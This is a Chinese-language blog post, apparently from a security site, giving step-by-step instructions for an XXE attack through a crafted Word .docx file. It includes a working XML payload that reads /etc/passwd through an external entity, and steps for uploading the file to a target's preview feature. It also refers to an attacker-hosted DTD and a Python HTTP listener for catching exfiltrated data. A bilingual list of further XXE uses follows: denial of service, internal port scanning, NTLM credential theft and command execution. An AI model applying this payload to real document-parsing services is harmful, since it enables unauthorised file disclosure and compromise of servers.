DOCX XXE 详细步骤

看到有漏洞详情,但是没有具体说步骤,我这里整理一下:
1、创建一个.docx文件,并随意写入文件<不写文件是打不开的>
2、用7.zip解压.docx文件,找到.xml文件
2015010619173460834.png

3、修改.xml文件,插入XXE代码:
2015010619175485419.png

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 
<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>    //插入代码 
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00864BB8" w:rsidRDefault="00630334"><w:r><w:t>test &xxe;</w:t></w:r></w:p><w:sectPr w:rsidR="00864BB8" w:rsidSect="00864BB8"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

或者使用如下payload:
2015010619181888560.jpg
在自己的服务器上上传ext.dtd文件,内容为:
2015010619183899714.jpg

4、上传.docx文件,点击预览
或者在自己的服务器上监听80端口:

sudo python -m SimpleHTTPServer 80

XXE威胁:

1- DoS on the parsing system by making it open, e.g.file:///dev/random | file:///dev/urandom | file://c:/con/con 
1、通过打开file:///dev/random | file:///dev/urandom | file://c:/con/con等文件造成解析系统DOS 

2- TCP scans using HTTP external entities (including behind firewalls since application servers often have world view different from that of the attacker) 
2、通过使用http外部输入进行TCP扫描 
3- Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back) 
3、非授权访问解析系统上以XML文件存储的数据<攻击者需要采用某种方法是这些数据返回> 
4- DoS on other systems (if parsing system is allowed to establish TCP connections to other systems) 
4、在其他系统上找出DOS<如果解析系统允许与其他系统建立TCP连接> 
5- NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?) 
5、通过初始化访问访问受攻击者控制服务器的UNC文件窃取NTLM 认证资料 
6- Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS. 
6、世界末日情景:攻击者可以使用一个广泛部署并且高连接的脆弱应用实现DDOS 
7- Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper 
- See more at: http://attack-secure.com/hacked-facebook-word-document/#sthash.sggH5LSK.dpuf 
7、目录遍历、读系统和应用文件,在某种情况下还可以使用PHP expect执行系统命令
标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码
评论列表
  1. test

    1创建docx---2用WinRAR解压---3修改xml---4保存---5打包为zip---6改名为docx---7上传--8-预览
    1-4步骤都知道,5-6可以这么做吗?说好的详细呢。。。因为我一直在测试,发现这个样子不行啊。。

    回复
添加新评论